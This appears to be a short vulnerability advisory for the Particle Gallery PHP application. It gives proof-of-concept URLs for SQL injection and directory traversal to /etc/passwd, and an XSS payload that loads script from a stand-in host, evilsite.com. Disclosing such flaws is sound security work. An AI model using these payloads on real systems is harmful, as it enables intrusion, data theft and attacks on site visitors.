Homepage: http://www.particlesoft.net/particlegallery/ Effected files: viewimage.php viewalbum.php SQL Injection: http://www.example.com/viewimage.php?imageid=' XSS Vulnerability proof of concept: http://www.example.com/viewimage.php?imageid=<iframe%20src=http://evilsite.com/scriptlet.html> Possible Directory Traversal ?: http://www.example.com/viewalbum.php?albumid=../../../../etc/passwd/